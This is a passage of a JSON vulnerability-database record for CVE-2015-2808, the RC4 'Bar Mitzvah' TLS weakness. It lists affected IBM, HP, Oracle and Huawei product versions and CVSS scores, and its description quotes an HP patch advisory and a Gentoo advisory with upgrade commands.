control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.10" }, { "model": "java sdk sr13-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.14" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.051" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.01" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.6" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.4" }, { "model": "security identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "propel", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.10" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "s7700 v200r007c00spc500", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system storage ts3310 tape library 660g", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "infosphere optim configuration manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "spss analytic server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "emptoris sourcing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.0.1" }, { "model": "rational team concert ifix5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.6" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "jrockit r28.2.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7" }, { "model": "flashcopy manager for unix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.0" }, { "model": "netiq sentinel build", "scope": "ne", "trust": 0.3, "vendor": "novell", "version": "8.0.0.03211" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.711" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.11" }, { "model": "flashcopy manager for unix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1.2" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "java sdk 6r1 sr8", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "notes and domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.725" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "mq light", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.40" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.051" }, { "model": "gbesm 1g l2/7", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "21.0.22.0" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7.005" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.61" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087520" }, { "model": "security key lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "db2\u00ae workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.2" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.33" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.72" }, { "model": "sterling connect:enterprise for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0.37" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.031" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.5" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.40" }, { "model": "qradar siem patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.43" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.18" }, { "model": "layer gbesm", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2/35.3.7.0" }, { "model": "db2\u00ae advanced enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1.3" }, { "model": "p6000 command view software", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "10.3.7" }, { "model": "db2\u00ae connect? application server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "connect-it", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.51" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.35" }, { "model": "system networking rackswitch g8264", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.100" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8677" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4.2" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.5" }, { "model": "bsm connector", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.00" }, { "model": "db2 enterprise server edition fp11", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.5" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "emptoris strategic supply management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.2.6" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.0.5" }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.2" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "flex system chassis management module 2pet10d", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flex system chassis management module 2pete5o", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.3" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.12" }, { "model": "db2 connect application server edition fp6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59407)0" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "propel", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.11" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350078390" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "flashcopy manager for oracle", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.0" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.5" }, { "model": "flashcopy manager for oracle", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11" }, { "model": "powervc express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "jrockit r27.8.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "unstructured data identification and mgmt", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "operations agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.12" }, { "model": "tivoli netcool/omnibus webgui", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.10" }, { "model": "quidway s9300 v100r006c00b010", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.91" }, { "model": "jrockit r28.2.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "abyp-2t-0s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1" }, { "model": "p6000 command view software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.3" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.33" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.32" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "emptoris spend analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.00" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.8" }, { "model": "infosphere biginsights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.01" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.33" }, { "model": "flashcopy manager for custom applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "db2\u00ae enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "websphere business events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.34" }, { "model": "smartcloud orchestrator fp1 ifix7", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.2" }, { "model": "smartcloud provisioning fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.31" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.4" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.010" }, { "model": "oceanstor s6800t v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "qradar siem mr2 patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.19" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.12" } ], "sources": [ { "db": "BID", "id": "73684" }, { "db": "NVD", "id": "CVE-2015-2808" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "133274" }, { "db": "PACKETSTORM", "id": "133344" }, { "db": "PACKETSTORM", "id": "133366" }, { "db": "PACKETSTORM", "id": "138866" }, { "db": "PACKETSTORM", "id": "132345" }, { "db": "PACKETSTORM", "id": "136248" } ], "trust": 0.6 }, "cve": "CVE-2015-2808", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2015-2808", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-80769", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2015-2808", "trust": 1.0, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-80769", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-80769" }, { "db": "NVD", "id": "CVE-2015-2808" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The RC4 algorithm, as used in the TLS protocol and SSL protocol, does not properly combine state data with key data during the initialization phase, which makes it easier for remote attackers to conduct plaintext-recovery attacks against the initial bytes of a stream by sniffing network traffic that occasionally relies on keys affected by the Invariance Weakness, and then using a brute-force approach involving LSB values, aka the \"Bar Mitzvah\" issue. The RC4 algorithm, as used in SSL/TLS is prone to a security weakness that may allow attackers to recover plain-text. \nSuccessfully exploiting this issue in conjunction with other latent vulnerabilities may allow attackers to gain access to sensitive information that may aid in further attacks. RC4 is a stream encryption algorithm with variable key length developed by American software developer Ronald Rivest. The algorithm consists of a pseudo-random number generator and an XOR operation, and supports encryption and decryption using the same key. There is a security loophole in the RC4 algorithm used in the TLS protocol and the SSL protocol. The loophole stems from the fact that the program does not correctly combine state data and key data during the initialization phase. A remote attacker can exploit this vulnerability to perform a plaintext-recovery attack on the initialization bytes in the data stream by sniffing specific network traffic and then conducting a brute force attack. v9.1x, v9.2x, v10.0x\nHP Network Node Manager iSPI Performance for QA v9.0x, v9.1x, v9.2x, v10.0x\nHP Network Node Manager iSPI for IP Multicast QA v9.0x, v9.1x, v9.2x, v10.0x\nHP Network Node Manager iSPI for MPLS VPN v9.0x, v9.1x, v9.2x, v10.0x\nHP Network Node Manager iSPI for IP Telephony v9.0x, v9.1x, v9.2x, v10.0x\nHP Network Node Manager iSPI for NET v9.0x, v9.1x, v9.2x, v10.0x\nHP Network Node Manager iSPI Performance for Metrics v9.0x, v9.1x, v9.2x,\nv10.0x\nHP Network Node Manager iSPI Performance for Traffic v9.0x, v9.1x, v9.2x,\nv10.0x\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-4000 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2015-2808 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2015-0204 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following updates for HP Network Node Manager i and Smart\nPlugins (iSPIs)\n\nHP Network Node Manager i and Smart Plugins (iSPIs) Version\n Link to update for CVE-2015-4000 (LogJam)\n\nHP Network Node Manager i version v9.1x, v9.2x\niSPI Performance for QA\niSPI for IP Multicast\niSPI for MPLS VPN\niSPI for IP Telephony\n\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01704653\n\nHP Network Node Manager iSPI for Metrics v9.1x, v9.2x\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01740484\n\nHP Network Node Manager iSPI for Traffic v9.1x, v9.2x\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01740489\n\nNote: v10.x is not affected by LogJam\n\nHP Network Node Manager i and Smart Plugins (iSPIs) Version\n Link to update for CVE-2015-2808 (Bar Mitzvah)\n\nHP Network Node Manager i version v9.1x, v9.2x, v10.x\niSPI Performance for QA\niSPI for IP Multicast\niSPI for MPLS VPN\niSPI for IP Telephony\n\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01704651\n\nHP Network Node Manager iSPI for Metrics v9.1x, v9.2x, v10.0x\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01740486\n\nHP Network Node Manager iSPI for Traffic v9.1x, v9.2x, v10.0x\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01740487\n\nHP Network Node Manager i and Smart Plugins (iSPIs) Version\n Link to update for CVE-2015-0204 (Freak)\n\nHP Network Node Manager i version v9.x, v10.x\niSPI Performance for QA\niSPI for IP Multicast\niSPI for MPLS VPN\niSPI for IP Telephony\n\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01704633https://softwaresupport.hp.com/group/softwaresupport/\nsearch-result/-/facetsearch/document/KM01704633\n\nHP Network Node Manager iSPI for Metrics v9.1x, v9.2x\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01740481\n\nHP Network Node Manager iSPI for Traffic v9.1x, v9.2x\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01740488\n\nNote: v10.x is not affected by FREAK\n\nHISTORY\nVersion:1 (rev.1) - 20 August 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \nHP Performance Manager v9.0x and v9.20. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201512-10\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Mozilla Products: Multiple vulnerabilities\n Date: December 30, 2015\n Bugs: #545232, #554036, #556942, #564818, #568376\n ID: 201512-10\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Mozilla Firefox and\nThunderbird, the worst of which may allow user-assisted execution of\narbitrary code. \n\nBackground\n==========\n\nMozilla Firefox is an open-source web browser and Mozilla Thunderbird\nan open-source email client, both from the Mozilla Project. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 www-client/firefox \u003c 38.5.0 \u003e= 38.5.0\n 2 www-client/firefox-bin \u003c 38.5.0 \u003e= 38.5.0\n 3 mail-client/thunderbird \u003c 38.5.0 \u003e= 38.5.0\n 4 mail-client/thunderbird-bin\n \u003c 38.5.0 \u003e= 38.5.0\n -------------------------------------------------------------------\n 4 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Mozilla Firefox and\nMozilla Thunderbird. Please review the CVE identifiers referenced below\nfor details. \n\nImpact\n======\n\nA remote attacker could entice a user to view a specially crafted web\npage or email, possibly resulting in execution of arbitrary code or a\nDenial of Service condition. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Firefox users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=www-client/firefox-38.5.0\"\n\nAll Firefox-bin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=www-client/firefox-bin-38.5.0\"\n\nAll Thunderbird users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=mail-client/thunderbird-38.5.0\"=\n\n\nAll Thunderbird-bin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=mail-client/thunderbird-bin-38.5.0\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-0798\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0798\n[ 2 ] CVE-2015-0799\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0799\n[ 3 ] CVE-2015-0801\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0801\n[ 4 ] CVE-2015-0802\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0802\n[ 5 ] CVE-2015-0803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0803\n[ 6 ] CVE-2015-0804\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0804\n[ 7 ] CVE-2015-0805\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0805\n[ 8 ] CVE-2015-0806\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0806\n[ 9 ] CVE-2015-0807\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0807\n[ 10 ] CVE-2015-0808\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0808\n[ 11 ] CVE-2015-0810\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0810\n[ 12 ] CVE-2015-0811\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0811\n[ 13 ] CVE-2015-0812\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0812\n[ 14 ] CVE-2015-0813\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0813\n[ 15 ] CVE-2015-0814\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0814\n[ 16 ] CVE-2015-0815\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0815\n[ 17 ] CVE-2015-0816\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0816\n[ 18 ] CVE-2015-2706\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2706\n[ 19 ] CVE-2015-2721\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2721\n[ 20 ] CVE-2015-2722\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2722\n[ 21 ] CVE-2015-2724\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2724\n[ 22 ] CVE-2015-2725\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2725\n[ 23 ] CVE-2015-2726\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2726\n[ 24 ] CVE-2015-2727\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2727\n[ 25 ] CVE-2015-2728\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2728\n[ 26 ] CVE-2015-2729\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2729\n[ 27 ] CVE-2015-2730\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2730\n[ 28 ] CVE-2015-2731\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2731\n[ 29 ] CVE-2015-2733\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2733\n[ 30 ] CVE-2015-2734\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2734\n[ 31 ] CVE-2015-2735\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2735\n[ 32 ] CVE-2015-2736\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2736\n[ 33 ] CVE-2015-2737\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2737\n[ 34 ] CVE-2015-2738\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2738\n[ 35 ] CVE-2015-2739\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2739\n[ 36 ] CVE-2015-2740\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2740\n[ 37 ] CVE-2015-2741\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2741\n[ 38 ] CVE-2015-2742\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2742\n[ 39 ] CVE-2015-2743\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2743\n[ 40 ] CVE-2015-2808\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2808\n[ 41 ] CVE-2015-4000\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4000\n[ 42 ] CVE-2015-4495\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4495\n[ 43 ] CVE-2015-4513\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4513\n[ 44 ] CVE-2015-4514\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4514\n[ 45 ] CVE-2015-4515\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4515\n[ 46 ] CVE-2015-4518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4518\n[ 47 ] CVE-2015-7181\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7181\n[ 48 ] CVE-2015-7182\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7182\n[ 49 ] CVE-2015-7183\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7183\n[ 50 ] CVE-2015-7187\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7187\n[ 51 